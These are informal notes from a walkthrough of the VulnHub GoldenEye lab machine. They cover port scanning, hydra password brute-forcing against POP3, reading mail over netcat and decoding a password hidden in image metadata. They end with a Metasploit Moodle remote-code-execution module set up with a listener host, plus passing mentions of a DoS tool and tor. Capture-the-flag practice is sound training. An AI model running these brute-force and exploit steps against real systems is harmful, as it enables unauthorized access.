Golden Eye Vulnerability

#vulnhub #walkthrought

Goldenn eye v1 passthrough

PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown

encoded password -InvincibleHack3r

user password
boris secret1!
natalya bird
xenia RCP90rulez!
doak goat
username: dr_doak
password: 4England!
hash eFdpbnRlcjE5OTV4IQ==
admin xWinter1995x!

arp

	sudo netdiscover -r 192.168.0.0/24 -i eth0

./nmapAutomator.sh 192.168.0.199 All
192.168.0.199/terminal.js
brup pro
decoder option
InvincibleHack3r

InvincibleHack3r

user password
boris InvincibleHack3r
http://192.168.0.199/sev-home/

nc 192.168.0.199 55006
LIST

user boris
pass secret1

http://severnaya-station.com/gnocertdir
mozilla proxy or host name

sudo nano /etc/hosts
192.168.0.199 severnaya-station.com/gnocertdir

WEBPAGE
VIEW PAGE SOURCE INNSPECT

INDEX.JS
telnet 192.168.0.199 55007

sudo apt install hydra

sudo apt install wordlists

hydra -l boris -P /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt 192.168.0.199 -s 55007 pop3

nc 192.168.0.199 55007
user boris
pass secret1
LIST
+OK 3 messages:
1 544
2 373
3 921
RETR 1
RETR 2
RETR 3

hydra -l doak -P /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt 192.168.0.199 -s 55007 pop3

nc 192.168.0.199 55007
user doak
pass secret1
LIST
+OK 3 messages:
1 544
2 373
3 921
RETR 1
RETR 2
RETR 3
http://severnaya-station.com/gnocertdir
username: dr_doak
password: 4England!

search s3cret .txt
http://severnaya-station.com/dir007key/for-007.jpg
save file
sudo apt install exiftool
exiftool for-007.jpg
search image discription >>>>> eFdpbnRlcjE5OTV4IQ==
https://www.base64decode.org/
eFdpbnRlcjE5OTV4IQ==
decode
xWinter1995x!

http://severnaya-station.com/
admin xWinter1995x
site administration>Plugins>Text editor>manage editor>
Pspellshell
search google pspell shell exploit

msfconsole
search moodle
use exploit/multi/http/moodle_spelling_path_rce
choose zero
show info
options
set PASSWORD xWinter1995x!
set RHOSTS severnaya-station.com
set targeturi /gnocertdir
set LHOST 192.168.0.181
control l key press
options
run
https://github.com/jseidl/GoldenEye
service tor start

sudo apt-get install etherape
sudo etherape